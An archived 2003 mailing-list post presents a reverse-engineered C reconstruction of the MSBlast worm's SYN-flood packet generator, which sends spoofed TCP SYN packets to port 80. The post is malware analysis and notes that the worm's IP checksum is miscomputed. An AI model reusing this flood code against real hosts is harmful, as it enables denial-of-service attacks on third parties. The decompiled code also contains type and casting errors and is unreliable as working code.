startling new discovery in the msblast analysis

From: Rolles, Rolf (rolf.rollesat_private)
Date: Fri Aug 15 2003 - 17:53:09 PDT

  • Next message: Dragos Ruiu: "Re: CNN: 'Explores Possibility that Power Outage is Related to Internet Worm'"

    First, this blurb from the IP header RFC:
    Header Checksum:  16 bits
        A checksum on the header only.  Since some header fields change
        (e.g., time to live), this is recomputed and verified at each point
        that the internet header is processed.
    Now, check the fixed (as in, my recode was faulty) packet generator function:
    void build_and_send_packets(unsigned long msipaddr, socket s)
     /* many thanks to "a whited sepulchre" for his insight.  many of the comments
     are taken verbatim from an email he sent me. */
     char buf1[0xc];
     char buf[0x64];
     sockaddr to;
     char name[0x10];
     sprintf(&name, "%i.%i.%i.%i", class_a, class_b, rand()%255, rand()%255);
     to.sa_data=(unsigned int)htons(0x50);
     memcpy(&to.sa_data+2,&msipaddr,4);   // IPheader fields below
     buf[0x50]=(unsigned int)0x45;        // version=4, ihl=5, tos=0;
     buf[0x52]=(unsigned int)htons(0x28); // length=40;
     buf[0x54]=(unsigned int)1;      // id = 1
     buf[0x56]=(unsigned int)0;      // flags=0, fragment offset=0
     buf[0x58]=(unsigned short)0x80;      // ttl = 128
     buf[0x59]=(unsigned short)6;      // proto = 6 (TCP)
     buf[0x5a]=(unsigned int)0;      // checksum = 0 (computed later)
     buf[0x60]=(unsigned long)msipaddr;   // src =
     buf[0x3c]=(unsigned int)htons((rand() % 1000)+1000); // tcp:  sport=random;
     buf[0x3e]=(unsigned int)htons(0x50); // TCP header:  dport=80;
     var_9c |= rand();
     var_9c &= (unsigned long)0x0000FFFF;
     buf[0x40]=(unsigned long)htons(var_9c); // seqno = random 16-bits
     buf[0x44]=(unsigned long)0;      // ackno=0;
     buf[0x48]=(unsigned short)0x50;  // data offset = 5;
     buf[0x49]=(unsigned short)2;  // SYN == true
     buf[0x4a]=(unsigned int)htons(0x4000); // window == 400
     buf[0x4c]=(unsigned int)0;  // csum=0 (computer later)
     buf[0x4e]=(unsigned int)0;  // uptr = 0;
     buf[0x5c]=(unsigned long)msipaddr; // data is merely the IP address
     buf1[0]=(unsigned long)msipaddr;   // source addr
     buf1[4]=(unsigned long)msipaddr; // dest addr
     buf1[8]=(unsigned short)0;  // zero
     buf1[9]=(unsigned short)0;  // protocol=0
     buf1[10]=(unsigned int)htons(0x14); // length = 20
     memcpy(&buf, &buf1, 0xc);  // copy pseudo header
     memcpy(&buf[0xc], &buf[0x3c], 0x14);  // FIXED
     buf[0x4c]=(unsigned int)checksum(&buf, 0x20);  // compute checksum over pseudoheader and tcp header
     memcpy(&buf, &buf[0x50], 0x14);  // copy IP header w/o checksum
     memcpy(&buf[0x14], &buf[0x3c], 0x14); // copy TCP header w/checksum
     memset(&buf[0x28], (unsigned int) 0, 4); // copy null value never referenced
    /* the ASM corresponding to the next line
    push    28h
    lea     eax, [ebp+buf]
    push    eax
    call    compute_checksum */
     buf[0x5a]=(unsigned int)checksum(&buf, 0x28); 
     // this is wrong (in practice).  according to the RFC, the IP checksum should ONLY be computed
     // over the IP header and no part of the payload.  however, in referencing the 
     // assembly, this C code is accurate.  therefore, this worm sends bogus packets that will
     // be dropped at the gateway.
     // the correct code would be :
     // buf[0x5a]=(unsigned int)checksum(&buf, 0x14); 
     memcpy(&buf, &buf[0x50], 0x14); // copy IP header with bogus checksum to start of packet
     sendto(s, &buf, 0x28, NULL, &to, 0x10); // send it off to be dropped
    Rolf Rolles
    PS check in a few hours for updates to the (living) msblast analysis.

    This archive was generated by hypermail 2b30 : Mon Aug 18 2003 - 10:27:04 PDT